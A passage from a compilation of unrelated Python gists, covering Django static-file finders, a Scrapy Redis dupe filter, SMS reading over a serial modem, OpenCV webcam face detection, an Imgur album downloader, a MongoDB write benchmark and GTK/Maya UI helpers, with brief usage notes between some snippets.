protocol = dns.DNSDatagramProtocol(factory)
factory.noisy = protocol.noisy = verbosity
reactor.listenUDP(53, protocol)
reactor.listenTCP(53, factory)
reactor.run()
```
#### File: hard-gists/1160696/snippet.py
```python
import base64
from myapplication import app
class MyTestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def open_with_auth(self, url, method, username, password):
return self.app.open(url,
method=method,
headers={
'Authorization': 'Basic ' + base64.b64encode(username + \
":" + password)
}
)
def test_login(self):
res = self.open_with_auth('/user/login', 'GET', 'username',
'password')
```
#### File: hard-gists/1165344/snippet.py
```python
import os
from django.conf import settings
from django.contrib.staticfiles.finders import BaseFinder, AppDirectoriesFinder
from django.contrib.staticfiles.storage import AppStaticStorage
from django.core.files.storage import FileSystemStorage
from django.utils._os import safe_join
class AppMediaStorage(AppStaticStorage):
source_dir = 'media'
class MediaFinder(AppDirectoriesFinder):
storage_class = AppMediaStorage
class MediaRootFinder(BaseFinder):
"""
Since the static files runserver can not find media definitions, it is now
added by this finder. This way you don't have to define anything in urls.py
to make django server both static and media files.
"""
def find(self, path, all=False):
"""
Looks for files in the MEDIA_ROOT
"""
media_prefix = settings.MEDIA_URL.replace(settings.STATIC_URL, '')
if path.startswith(media_prefix):
location = safe_join(settings.STATIC_ROOT, path)
if os.path.exists(location):
if not all:
return location
return [location]
return []
def list(self, ignore_patterns):
"""
List all files in all locations.
"""
yield settings.MEDIA_ROOT, FileSystemStorage()
```
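A sketch of how these finders would be enabled; the dotted paths assume the module above lives at a hypothetical `myproject/finders.py`.
```python
# settings.py
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    'myproject.finders.MediaFinder',      # hypothetical module path
    'myproject.finders.MediaRootFinder',  # hypothetical module path
)
```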
#### File: hard-gists/1177373/snippet.py
```python
import redis
from scrapy.dupefilter import BaseDupeFilter
from scrapy.utils.request import request_fingerprint
class RedisDupeFilter(BaseDupeFilter):
def __init__(self, host, port):
self.redis = redis.Redis(host, port)
@classmethod
def from_settings(cls, settings):
host = settings.get('REDIS_HOST', 'localhost')
port = settings.get('REDIS_PORT', 6379)
return cls(host, port)
def request_seen(self, request):
fp = request_fingerprint(request)
added = self.redis.sadd('fingerprints', fp)
return not added
```
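A sketch of the Scrapy settings that would wire the filter in; the dotted path is hypothetical and depends on where the class is saved.
```python
# settings.py
DUPEFILTER_CLASS = 'myproject.dupefilters.RedisDupeFilter'  # hypothetical module path
REDIS_HOST = 'localhost'  # read by RedisDupeFilter.from_settings
REDIS_PORT = 6379
```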
#### File: hard-gists/1262332/snippet.py
```python
import serial
import time
from messaging.sms import SmsDeliver
ser=serial.Serial('/dev/ttyACM0', baudrate=9600, timeout=.1, rtscts=0)
def sendCommand(com):
ser.write(com+"\r\n")
time.sleep(2)
ret = []
while ser.inWaiting() > 0:
msg = ser.readline().strip()
msg = msg.replace("\r","")
msg = msg.replace("\n","")
if msg!="":
ret.append(msg)
return ret
def readSMS():
print("LOOKING FOR SMS")
list = sendCommand("AT+CMGL=0")
ret = []
for item in list:
#print item
if item.startswith("+CMGL:") == False:
if item!="OK":
ret.append(SmsDeliver(item))
return ret
def killSMS():
print("DELETING ALL MESSAGES")
print sendCommand("AT+CMGD=1,1")
def main():
print("SENDING HELLO")
com="ERROR"
count=0
while(com!="OK"):
com=sendCommand("AT")[0]
count+=1
if(count>5):
print "COULD NOT GET A HELLO, all I got was "+com
return
print("OK")
print("CHANGING MESSAGE FORMAT")
print(sendCommand("AT+CMGF=0")[0])
while(True):
sms = readSMS()
for s in sms:
print ""
print "SMS"
print s.text
time.sleep(1)
time.sleep(6)
killSMS()
if __name__ == "__main__":
if ser.isOpen():
main()
else:
print "ERROR: CAN't OPEN CONNECTION"
ser.close()
```
#### File: hard-gists/1264102/snippet.py
```python
from sys import modules
import gc
import inspect
import six
from django.core.management.base import BaseCommand, CommandError
from django.dispatch.dispatcher import Signal, WeakMethod
FORMATS = {
'vim': '{path}:{line}:{name}',
'human': '{name} in line {line} of {path}',
}
class Command(BaseCommand):
help = 'Show all signals receivers'
def add_arguments(self, parser):
parser.add_argument('--line_format', choices=FORMATS.keys(), default='human',
help='Line format (available choices: {0})'.format(', '.join(FORMATS))
)
def handle(self, *args, **options):
line_format = options['line_format']
if line_format not in FORMATS:
            raise CommandError('line_format must be one of {0}, not {1}'.format(', '.join(FORMATS), line_format))
msg = FORMATS[line_format]
signals = [obj for obj in gc.get_objects() if isinstance(obj, Signal)]
for signal in signals:
for receiver in signal.receivers:
_, receiver = receiver
func = receiver()
name = func.__qualname__ if six.PY3 else func.__name__
print(msg.format(name=name, line=inspect.getsourcelines(func)[1], path=inspect.getsourcefile(func)))
```
#### File: hard-gists/1269098/snippet.py
```python
import sys
import cv
class FaceDetect():
def __init__(self):
cv.NamedWindow ("CamShiftDemo", 1)
device = 0
self.capture = cv.CaptureFromCAM(device)
capture_size = (320,200)
cv.SetCaptureProperty(self.capture, cv.CV_CAP_PROP_FRAME_WIDTH, capture_size[0])
cv.SetCaptureProperty(self.capture, cv.CV_CAP_PROP_FRAME_HEIGHT, capture_size[1])
def detect(self):
cv.CvtColor(self.frame, self.grayscale, cv.CV_RGB2GRAY)
#equalize histogram
cv.EqualizeHist(self.grayscale, self.grayscale)
# detect objects
faces = cv.HaarDetectObjects(image=self.grayscale, cascade=self.cascade, storage=self.storage, scale_factor=1.2,\
min_neighbors=2, flags=cv.CV_HAAR_DO_CANNY_PRUNING)
if faces:
#print 'face detected!'
for i in faces:
if i[1] > 10:
cv.Circle(self.frame, ((2*i[0][0]+i[0][2])/2,(2*i[0][1]+i[0][3])/2), (i[0][2]+i[0][3])/4, (128, 255, 128), 2, 8, 0)
def run(self):
# check if capture device is OK
if not self.capture:
print "Error opening capture device"
sys.exit(1)
self.frame = cv.QueryFrame(self.capture)
self.image_size = cv.GetSize(self.frame)
# create grayscale version
self.grayscale = cv.CreateImage(self.image_size, 8, 1)
# create storage
self.storage = cv.CreateMemStorage(128)
self.cascade = cv.Load('haarcascade_frontalface_default.xml')
while 1:
# do forever
# capture the current frame
self.frame = cv.QueryFrame(self.capture)
if self.frame is None:
break
# mirror
cv.Flip(self.frame, None, 1)
# face detection
self.detect()
# display webcam image
cv.ShowImage('CamShiftDemo', self.frame)
# handle events
k = cv.WaitKey(10)
if k == 0x1b: # ESC
print 'ESC pressed. Exiting ...'
break
sys.exit(1)
if __name__ == "__main__":
print "Press ESC to exit ..."
face_detect = FaceDetect()
face_detect.run()
```
#### File: hard-gists/1306719/snippet.py
```python
from html.parser import HTMLParser
from urllib import request
import os.path
import re
import json
import sys
class ImgListScraper( HTMLParser ):
IMG_URL = "http://i.imgur.com/{hash}{ext}"
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
self.in_javascript = False
self.data = None
def handle_starttag( self, tag, attrs ):
attrs = dict( attrs )
if tag == "script" and attrs['type'] == "text/javascript":
self.in_javascript = True
def handle_data( self, data ):
if self.in_javascript:
img_block = False
for line in data.splitlines():
if line.find("ImgurAlbum") > -1:
img_block = True
elif img_block and line.strip().startswith("images:"):
data = line.strip()[ len( "images: " ) : -1 ]
self.data = json.loads( data )
img_block = False
self.in_javascript = False
def img_urls( self ):
for image in self.data['items']:
yield self.IMG_URL.format( **{
'hash': image['hash'],
'ext': image['ext']
})
def download_image( url, folder ):
path = os.path.join( folder, url.split("/")[-1] )
res = request.urlopen( url )
with open( path, 'wb' ) as f:
f.write( res.read() )
res.close()
def download_album( album_url, folder ):
print( "Scraping album..." )
scraper = ImgListScraper()
html = request.urlopen( album_url ).read().decode( 'utf8' )
scraper.feed( html )
total = scraper.data['count']
for ( pos, img_url ) in enumerate( scraper.img_urls() ):
print( "downloading {img_url} ({pos} of {total})".format(
img_url = img_url,
pos = pos,
total = total ) )
download_image( img_url, folder )
if __name__ == '__main__':
if len( sys.argv ) < 3:
print( "Usage: {script} ALBUM_URL FOLDER".format( script = sys.argv[0]
) )
else:
download_album( sys.argv[1], sys.argv[2] )
```
#### File: hard-gists/1367378/snippet.py
```python
import sys
import pymongo
import time
import getopt
import copy
from pymongo import Connection
from pymongo.database import Database
from datetime import datetime, timedelta
from locale import atoi
import random
import math
import threading
import logging
from Queue import Queue
def get_mongo_db(host):
connection = Connection(host,
port=27017)
db = Database(connection, "atest")
db.set_profiling_level(0)
return db
def generate_uuids(num, length=6):
results = []
for i in range(num):
val = random.randint(0,2**(length*8))
results.append("%x" % val)
return results
def generate_and_insert_ids(coll, doc_template, num_docs, prepad, associative, logger):
logger.debug("Starting uuid generation and insertion")
uuids = generate_uuids(num_docs)
start = time.time()
for uuid in uuids:
doc_template["uuid"] = uuid
coll.insert(doc_template, None, safe=False)
if prepad:
coll.update({"uuid" : uuid} ,{ "$set" : { "logs" : [] }})
if associative:
coll.update({"uuid" : uuid} ,{ "$set" : { "logs" : {} }})
logger.debug("done inserting initial documents: %s ms\n" % ((time.time() - start) * 1000))
return uuids
class DBUpdater(threading.Thread):
def __init__(self, collection_name, queue, host):
self.queue = queue
threading.Thread.__init__(self)
self.db = get_mongo_db(host)
self.coll = self.db[collection_name]
self.daemon = True
def stop(self):
self.queue.put(None)
def run(self):
while True:
args = self.queue.get(True)
if args == None:
break
# self.coll.find(args[0])[0] # just to warm the cache, don't think we need it
self.coll.update(args[0], args[1], upsert=args[2], safe=args[3])
def run_test(num_docs = 100,
list_length = 1000,
entry_size = 300,
prepad = False,
in_place = False,
safe_write = False,
associative = False,
group_sub_list = 0,
num_threads = 2,
verbose = False,
host = "localhost"):
#settings / constants
time_buckets = 15
outer_loop_delay_ms = 100
inner_loop_delay_ms = 0
logger = logging.Logger(__name__)
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# locals
filler = "x" * entry_size
padding = []
dt = datetime.today()
db = get_mongo_db(host)
args = """num_docs: %d
array_element_size: %d
list_length: %d
prepad: %s
in_place: %s
safe_write: %s
associative: %s
group_sub_list: %d
num_threads: %d
""" % (num_docs,
entry_size,
list_length,
prepad,
in_place,
safe_write,
associative,
group_sub_list,
num_threads )
# argument processing
if group_sub_list == 0:
group_sub_list = list_length
if in_place:
padding = map( lambda f : filler, range(list_length))
elif prepad:
padding = "x" * (list_length * entry_size)
elif group_sub_list < list_length:
padding = {}
for hr in range(int(math.ceil(list_length / group_sub_list))):
padding["%d" % hr] = {"hr" : hr, "vals": [] }
doc_template = {
"day" : dt.day,
"month" : dt.month,
"year" : dt.year,
"logs" : padding,
}
# loop variables
counter = 0
dbwait_table = 0
times = []
coll = db.arraytest
time_div = float(list_length) / time_buckets
start = time.time()
# start doing something
coll.drop() # clean it out
coll.ensure_index([("uuid",pymongo.ASCENDING)])
uuids = generate_and_insert_ids(coll,
doc_template,
num_docs,
prepad,
associative,
logger)
oldidx = 0
i = 0
max_i = list_length * num_docs
update_start = time.time()
update_queue = Queue(num_threads * 2)
updaters = []
for j in range(num_threads):
updaters.append(DBUpdater("arraytest", update_queue, host))
updaters[j].start()
j += 1
while counter < list_length:
t1 = time.time()
idx = int(math.floor( i * time_buckets / max_i))
sublist_idx = counter / group_sub_list
if oldidx < idx:
logger.debug("\n%d of %d (%d of %d updates)" % ( idx + 1, time_buckets, i, max_i))
oldidx = idx
for uuid in uuids:
upsert_dict = {"$push" : { "logs" : filler }}
query = { "uuid" : uuid }
if group_sub_list < list_length:
query = {"uuid" : uuid }
upsert_dict = {"$push" : {"logs.%d.vals" % sublist_idx : filler }}
if associative:
upsert_dict = {"$set" : {"logs.%d" % counter : filler }}
if in_place:
upsert_dict = {"$set" : {"logs.%d" % counter : filler }}
if group_sub_list == 1:
# just insert, no updates
doc_template["uuid"] = uuid + "%d" % counter
doc_template["logs"] = filler
coll.insert(doc_template)
else:
update_queue.put( [query, upsert_dict, True, safe_write], True)
if verbose and (i % 100 == 0):
sys.stdout.write(".")
sys.stdout.flush()
i += 1
time.sleep(inner_loop_delay_ms / 1000)
insert_time = time.time() - t1
if len(times) <= idx:
times.append(0)
times[idx] += insert_time * 1000 / time_div / num_docs
counter += 1
time.sleep(outer_loop_delay_ms / 1000)
# shut down worker threads
logger.debug("stopping threads...")
for updater_thread in updaters:
updater_thread.stop()
logger.debug("joining threads...")
for updater_thread in updaters:
updater_thread.join()
logger.info("updates took %d ms" % ((time.time() - update_start)*1000))
print args
for i, timey in enumerate(times):
logger.info("%d: %f" % (i, timey))
return times
def expand_array(arglist):
i = 0
result = []
for arg in arglist:
if type(arg) == list:
results = []
for val in arg:
subarg = copy.deepcopy(arglist)
subarg[i] = val
                results.extend(expand_array(subarg))  # recurse on the copy; expand_dict expects a dict
return results
else:
result.append(arg)
i += 1
return [result]
def expand_dict(target):
i = 0
result = {}
for key, val in target.iteritems():
if type(val) == list:
results = []
for subval in val:
# split it into one dict for each value in the array and recurse
target_clone = copy.deepcopy(target)
target_clone[key] = subval
results.extend(expand_dict(target_clone))
return results
else:
result[key] = val
i += 1
return [result]
def usage():
print """
NAME
%s - measure mongo $push performance on arrays of a set size for a specified collection size
SYNOPSIS
%s: [ OPTIONS ]
DESCRIPTION
Run a test of a mongo database with a variety of parameters. Allows simple comparison of
different parameter values. If multiple parameters are passed in for any arguments,
run multiple tests on the cross product of all possible combinations and print out a
summary of the results on completion.
-a, --associative { y | n | yn | y,n } default False
        add entries as key-value pairs under the logs field instead of pushing them onto an array
-g --group_sub_list=sub_list_size
place entries in multiple lists under hash keys. List length is limited to sub_list_size.
-h, --help
print this usage info
-o, --host
mongodb host name or ip
-i, --in_place { y | n | yn | y,n } default False
create the entire document at the start, and simply $set the values in the loop
not compatible with -a
-l, --list_length=length default 1000
how many entries to add to the list in each document
-n, --num_docs=num default 100
total number of independent documents to create and fill
-p, --prepad { y | n | yn | y,n } default False
create documents with their ultimate size from the start, then immediately delete the padding
-s, --entry_size=size default 300
the size, in bytes, of each entry in the arrays. It is just a string of 'x' characters
-t, --num_threads=num default 2
the number of threads to use to update
-v, --verbose
print verbose info to console
-w, --safe_write { y | n | yn | y,n } default False
use the safe write flag (safe = True) for all updates and inserts
""" % (__file__, __file__)
def main():
dt = datetime.today() # - timedelta(days=5)
argv = sys.argv
# if this fails, add this to the environment:
    # export PYTHONPATH=$PYTHONPATH:.. (or wherever ears_tools is)
try:
opts, args = getopt.getopt(argv[1:], "hn:l:s:p:i:w:a:g:t:o:v", ["help",
"num_docs=",
"list_length=",
"entry_size=",
"prepad=",
"in_place=",
"safe_write=",
"associative=",
"group_sub_list=",
"num_threads=",
"host="
"verbose",
])
except getopt.GetoptError:
usage()
sys.exit(2)
args = { "num_docs" : 100,
"list_length" : 1000,
"entry_size" : 300,
"prepad" : False,
"in_place" : False,
"safe_write" : False,
"associative" : False,
"group_sub_list" : 0,
"num_threads" : 2,
"verbose" : False,
"host" : "localhost"
}
bool_map = { "y" : True, "n" : False, "yn" : [True,False], "y,n" : [True,False] }
try :
for opt, arg in opts:
if opt in ("-h", "--help"):
#TODO write usage
usage()
sys.exit()
elif opt in ("-n", "--num_docs"):
args["num_docs"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-l", "--list_length"):
args["list_length"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-s", "--entry_size"):
args["entry_size"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-p", "--prepad"):
args["prepad"] = bool_map.get(arg, "True")
elif opt in ("-i", "--in_place"):
args["in_place"] = bool_map.get(arg, "True")
elif opt in ("-w", "--safe_write"):
args["safe_write"] = bool_map.get(arg, "True")
elif opt in ("-a", "--associative"):
args["associative"] = bool_map.get(arg, "True")
elif opt in ("-g", "--group_sub_list"):
args["group_sub_list"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-o", "--host"):
args["host"] = arg
elif opt in ("-t", "--num_threads"):
args["num_threads"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-v", "--verbose"):
args["verbose"] = True
except Exception:
usage()
sys.exit(2)
argsetlist = expand_dict(args)
print "Running %d times, with the following argument sets: " % len(argsetlist)
for i, argset in enumerate(argsetlist):
print "%d: %r" % (i,argset)
# sys.exit(0)
times = []
for argset in argsetlist:
print "now running %r" % argset
times.append(run_test(**argset))
# print "\t".join(map(lambda x : "%r" % x,argsetlist))
for i, run in enumerate(argsetlist):
print "run #%d: %r" % (i, run)
print "Average time per insert operation, in ms"
for i, row in enumerate(zip(*times)):
print "%d:\t%r" % (i, row)
if __name__ == "__main__":
main()
```
#### File: hard-gists/1381489/snippet.py
```python
from PyQt4 import QtCore, QtGui
import maya.cmds as cmds
import maya.OpenMayaUI as mui
import sip
class MyDialog(QtGui.QDialog):
def __init__(self, parent, **kwargs):
super(MyDialog, self).__init__(parent, **kwargs)
self.setObjectName("MyWindow")
self.resize(800, 600)
self.setWindowTitle("PyQt ModelPanel Test")
self.verticalLayout = QtGui.QVBoxLayout(self)
self.verticalLayout.setContentsMargins(0,0,0,0)
# need to set a name so it can be referenced by maya node path
self.verticalLayout.setObjectName("mainLayout")
# First use SIP to unwrap the layout into a pointer
# Then get the full path to the UI in maya as a string
layout = mui.MQtUtil.fullName(long(sip.unwrapinstance(self.verticalLayout)))
cmds.setParent(layout)
paneLayoutName = cmds.paneLayout()
# Find a pointer to the paneLayout that we just created
ptr = mui.MQtUtil.findControl(paneLayoutName)
# Wrap the pointer into a python QObject
self.paneLayout = sip.wrapinstance(long(ptr), QtCore.QObject)
self.cameraName = cmds.camera()[0]
self.modelPanelName = cmds.modelPanel("customModelPanel", label="ModelPanel Test", cam=self.cameraName)
# Find a pointer to the modelPanel that we just created
ptr = mui.MQtUtil.findControl(self.modelPanelName)
# Wrap the pointer into a python QObject
self.modelPanel = sip.wrapinstance(long(ptr), QtCore.QObject)
# add our QObject reference to the paneLayout to our layout
self.verticalLayout.addWidget(self.paneLayout)
def showEvent(self, event):
super(MyDialog, self).showEvent(event)
# maya can lag in how it repaints UI. Force it to repaint
# when we show the window.
self.modelPanel.repaint()
def show():
# get a pointer to the maya main window
ptr = mui.MQtUtil.mainWindow()
# use sip to wrap the pointer into a QObject
win = sip.wrapinstance(long(ptr), QtCore.QObject)
d = MyDialog(win)
d.show()
return d
try:
dialog.deleteLater()
except:
pass
dialog = show()
```
#### File: hard-gists/1388243/snippet.py
```python
from django.contrib import admin
class ReadOnlyModelAdmin(admin.ModelAdmin):
"""
ModelAdmin class that prevents modifications through the admin.
The changelist and the detail view work, but a 403 is returned
if one actually tries to edit an object.
Source: https://gist.github.com/aaugustin/1388243
"""
actions = None
# We cannot call super().get_fields(request, obj) because that method calls
# get_readonly_fields(request, obj), causing infinite recursion. Ditto for
# super().get_form(request, obj). So we assume the default ModelForm.
def get_readonly_fields(self, request, obj=None):
return self.fields or [f.name for f in self.model._meta.fields]
def has_add_permission(self, request):
return False
# Allow viewing objects but not actually changing them.
def has_change_permission(self, request, obj=None):
return (request.method in ['GET', 'HEAD'] and
super().has_change_permission(request, obj))
def has_delete_permission(self, request, obj=None):
return False
```
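A minimal registration sketch; the model is hypothetical and `ReadOnlyModelAdmin` is assumed importable from wherever the class above is defined.
```python
from django.contrib import admin
from myapp.models import Invoice  # hypothetical model

admin.site.register(Invoice, ReadOnlyModelAdmin)
```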
#### File: hard-gists/1410088/snippet.py
```python
import opencv
#this is important for capturing/displaying images
from opencv import highgui
import pygame
import sys
camera = highgui.cvCreateCameraCapture(0)
def get_image():
im = highgui.cvQueryFrame(camera)
# Add the line below if you need it (Ubuntu 8.04+)
im = opencv.cvGetMat(im)
#convert Ipl image to PIL image
return opencv.adaptors.Ipl2PIL(im)
fps = 30.0
pygame.init()
window = pygame.display.set_mode((640,480))
pygame.display.set_caption("Demo")
screen = pygame.display.get_surface()
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT or event.type == pygame.KEYDOWN:
sys.exit(0)
im = get_image()
pg_img = pygame.image.frombuffer(im.tostring(), im.size, im.mode)
screen.blit(pg_img, (0,0))
pygame.display.flip()
pygame.time.delay(int(1000 * 1.0/fps))
```
#### File: hard-gists/1411980/snippet.py
```python
from __future__ import division
import os
import subprocess
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from PIL import Image
except ImportError:
import Image
class ImageMagickConversion(object):
GRAVITY_CHOICES = ('northwest', 'north', 'northeast', 'west', 'center',
'east', 'southwest', 'south', 'southeast')
def __init__(self, image=None, image_path=None, output_format=None,
image_magick_path='/usr/bin/', debug=False):
if image is None and image_path is None:
raise ValueError('Either an image or image path is required.')
self.args = []
self.out_format = None
self.image = image
self.image_path = image_path
self.output_format = output_format
self.image_magick_path = image_magick_path
self.debug = debug
def _cache_image_properties(self):
try:
pil_image = Image.open(self.image or self.image_path)
except IOError:
raise ValueError("Invalid image")
self._width, self._height = pil_image.size
self._format = pil_image.format
if self.image:
# reset the image to so it can be read again if needed
self.image.reset()
@property
def width(self):
if not hasattr(self, '_width'):
self._cache_image_properties()
return self._width
@property
def height(self):
if not hasattr(self, '_height'):
self._cache_image_properties()
return self._height
@property
def format(self):
if not hasattr(self, '_format'):
self._cache_image_properties()
return self._format
def gravity(self, position):
if position.lower() not in ImageMagickConversion.GRAVITY_CHOICES:
raise ValueError("Invalid value for position.")
self.args.extend(['-gravity', position])
return self
def crop(self, width, height, left=0, top=0):
self.args.extend(['-crop', '%dx%d+%d+%d' % (width, height, left, top)])
return self
def resize(self, width, height, preserve_aspect_ratio=True,
can_enlarge=False, outer=True):
if preserve_aspect_ratio:
if outer: # image can be bigger than resize box
ratio = max(width / self.width, height / self.height)
else: # image must fit within resize box
ratio = min(width / self.width, height / self.height)
if ratio >= 1 and not can_enlarge:
return self
width = int(round(self.width * ratio))
height = int(round(self.height * ratio))
self.args.extend(['-resize', '%dx%d' % (width, height)])
return self
def quality(self, quality):
self.args.extend(['-quality', unicode(quality)])
return self
def _process_image(self, command, pre_input_args, post_input_args,
input_image_path=None, input_image=None, output_image_path=None):
# support pipe or filesystem i/o
proc_kwargs = {}
if input_image_path:
input_arg = input_image_path
else:
input_arg = '-'
proc_kwargs['stdin'] = subprocess.PIPE
if output_image_path:
output_arg = output_image_path
else:
output_arg = '-'
proc_kwargs['stdout'] = subprocess.PIPE
proc_args = [os.path.join(self.image_magick_path, command)]
proc_args.extend(pre_input_args)
proc_args.append(input_arg)
proc_args.extend(post_input_args)
if self.output_format:
proc_args.append('%s:%s' % (self.output_format, output_arg))
else:
proc_args.append(output_arg)
if self.debug:
print 'ImageMagick: %s' % ' '.join(proc_args)
proc = subprocess.Popen(proc_args, **proc_kwargs)
if input_image:
proc_input = input_image.read()
input_image.reset()
else:
proc_input = None
stdoutdata, stderrdata = proc.communicate(input=proc_input)
if stdoutdata:
new_image = StringIO()
new_image.write(stdoutdata)
return new_image
else:
return output_image_path
def convert(self, output_image_path=None):
args = ['-auto-orient']
args.extend(self.args)
return self._process_image('convert', [], args,
input_image_path=self.image_path,
input_image=self.image,
output_image_path=output_image_path
)
def watermark(self, watermark_path, opacity=40, position='southeast',
output_image_path=None):
if position.lower() not in ImageMagickConversion.GRAVITY_CHOICES:
raise ValueError("Invalid value for position.")
if output_image_path:
convert_image_path = self.convert(
output_image_path=output_image_path)
convert_image = None
else:
convert_image_path = None
convert_image = self.convert()
args = (['-dissolve', unicode(opacity), '-gravity', position,
watermark_path])
return self._process_image('composite', args, [],
input_image_path=convert_image_path,
input_image=convert_image,
output_image_path=output_image_path
)
```
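A usage sketch of the fluent API above; file names are hypothetical.
```python
# Fit the image inside an 800x600 box, set JPEG quality, and write the result to disk.
conv = ImageMagickConversion(image_path='input.jpg', output_format='jpg')
conv.resize(800, 600, outer=False).quality(85)
conv.convert(output_image_path='output_small.jpg')
```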
#### File: hard-gists/1440754/snippet.py
```python
import csv
from github2.client import Github
# api settings for github
git_username = ''
git_api_token = ''
git_repo = ''
# csv name
csv_name = "git_hub_issues.csv"
def run_csv():
"""
Export github issues into a csv format
"""
output_csv = csv.writer(open(csv_name, 'wb'), delimiter=',')
github = Github(username=git_username, api_token=git_api_token)
# csv headers
headers = [
'id',
'title',
'body',
'state',
'creator',
'labels',
'created_at',
'updated_at',
'closed_at',
]
# write header rows
output_csv.writerow(headers)
# get the git issues and write the rows to the csv
git_issues = github.issues.list(git_repo)
for git_issue in git_issues:
print git_issue.title
labels = ' '.join(git_issue.labels)
        # a lot of these are blank because they are not really
# needed but if you need them just fill them out
issue = [
git_issue.number,
git_issue.title.encode('utf8'),
git_issue.body.encode('utf8'),
git_issue.state,
git_issue.user,
labels,
git_issue.created_at,
git_issue.updated_at,
git_issue.closed_at,
]
output_csv.writerow(issue)
if __name__ == '__main__':
run_csv()
```
#### File: hard-gists/1441019/snippet.py
```python
#!/usr/bin/env python
########################################################
# Created by: <NAME>
# Date Modified: Jan 29, 2008
#
# Purpose: quick and dirty gui to control PTZ of my
# Logitech Quickcam Orbit AF (actually there is no zoom
# control :)
#
# To Do:
# - Modify icons and labels
# - Detect difference between click and hold for
# continued movement of cam
# - Find out what doesn't work
# - Actually learn how to code in python instead of
# hacking together other peoples code
########################################################
import gtk
import subprocess
## The following imports aren't needed??
#import pygtk
#import gobject
#from subprocess import *
## The full path to uvcdynctrl
UVCDYNCTRLEXEC="/usr/bin/uvcdynctrl"
## The value indicates amount of movement for panning and tilt
## Max Ranges (determined with uvcdynctrl -v -c):
## Tilt = -1920 to 1920
## Pan = -4480 to 4480
panRight = "-100"
panLeft = "100"
tiltUp = "-100"
tiltDown = "100"
## Declare the main class
class ccUVCPTZ_Main:
## Define the init script to initialize the application
def __init__(self):
## Prep the Main Window for stuff
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
window.set_title("ccUVCPTZ")
window.connect("delete_event", self.hide, window)
window.connect("window-state-event", self.window_event, window)
## Create a StatusIcon for the app
statusIcon = gtk.StatusIcon()
## Let's build the menu for the StatusIcon
self.sMenu = gtk.Menu()
menuItem = gtk.ImageMenuItem(gtk.STOCK_OPEN)
menuItem.connect('activate', self.activate_window, window)
self.sMenu.append(menuItem)
menuItem = gtk.ImageMenuItem(gtk.STOCK_QUIT)
menuItem.connect('activate', self.exit, statusIcon)
self.sMenu.append(menuItem)
## Don't forget to include the icon actions itself
statusIcon.set_from_stock(gtk.STOCK_HOME)
statusIcon.set_tooltip("StatusIcon test")
statusIcon.connect('activate', self.activate_window, window)
statusIcon.connect('popup-menu', self.popup_menu, self.sMenu)
statusIcon.set_visible(True)
## Let's use a table to make a nice pretty grid for our buttons
self.table = gtk.Table(5, 3, True)
window.add(self.table)
## Time to build the buttons
# Tilt Up Button
self.tiltupBtn = gtk.Button(stock=gtk.STOCK_GO_UP)
self.tiltupBtn.connect("clicked", self.ptUp)
self.table.attach(self.tiltupBtn, 1, 2, 0, 1)
# Pan Left Button
self.panleftBtn = gtk.Button(stock=gtk.STOCK_GO_BACK)
self.panleftBtn.connect("clicked", self.ptLeft)
self.table.attach(self.panleftBtn, 0, 1, 1, 2)
# Pan/tilt Reset Button
self.resetBtn = gtk.Button(stock=gtk.STOCK_UNDO)
self.resetBtn.connect("clicked", self.ptReset)
self.table.attach(self.resetBtn, 1, 2, 1, 2)
# Pan Right Button
self.panrightBtn = gtk.Button(stock=gtk.STOCK_GO_FORWARD)
self.panrightBtn.connect("clicked", self.ptRight)
self.table.attach(self.panrightBtn, 2, 3, 1, 2)
# Tilt Down Button
self.tiltdownBtn = gtk.Button(stock=gtk.STOCK_GO_DOWN)
self.tiltdownBtn.connect("clicked", self.ptDown)
self.table.attach(self.tiltdownBtn, 1, 2, 2, 3)
# Quit Button
self.quitBtn = gtk.Button(stock=gtk.STOCK_QUIT)
self.quitBtn.connect("clicked", self.exit)
self.table.attach(self.quitBtn, 1, 2, 4, 5)
# Now display the table we built
self.table.show()
# Show the entire window
window.show_all()
## Now for the subfunctions required to actually do something for our app
# Tilt up
def ptUp(self, widget):
control = "Tilt (relative)"
value = tiltUp
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan Left
def ptLeft(self, widget):
control = "Pan (relative)"
value = panLeft
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Pan/Tilt Reset
def ptReset(self, widget):
control = "Pan/tilt Reset"
value = "3"
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, value]),
return True
# Pan Right
def ptRight(self, widget):
control = "Pan (relative)"
value = panRight
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Tilt Down
def ptDown(self, widget):
control = "Tilt (relative)"
value = tiltDown
result = subprocess.Popen([UVCDYNCTRLEXEC, "-s", control, "--", value]),
return True
# Quit the application completely
def exit(self, widget, data=None):
gtk.main_quit()
# Hide the window on certain events
def hide(self, widget, button, window):
if window.get_property ('visible'):
window.hide()
return window
# Detect if window was minimized and hide
def window_event(self, widget, event, window):
if event.changed_mask & gtk.gdk.WINDOW_STATE_ICONIFIED:
if event.new_window_state & gtk.gdk.WINDOW_STATE_ICONIFIED:
window.hide()
return window
# Show the popup menu
def popup_menu(self, widget, button, time, sMenu = None):
if sMenu:
sMenu.show_all()
sMenu.popup(None, None, None, 3, time)
pass
# Show the window if otherwise hidden, background, or minimized
def activate_window(self, widget, window):
if window.get_property ('visible'):
window.present()
else:
window.show_all()
window.deiconify()
## Let's call our class and load all info
ccUVCPTZ_Main()
## I don't think I need to worry about threads here??
#gtk.gdk.threads_init()
## Now let's run the init part of the script
gtk.main()
```
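For reference, every button in the dialog above boils down to a single `uvcdynctrl` call; a minimal sketch of the equivalent one-shot commands from a plain Python prompt, using the constants defined in the snippet (the binary path and the camera being the default video device are assumptions):
```python
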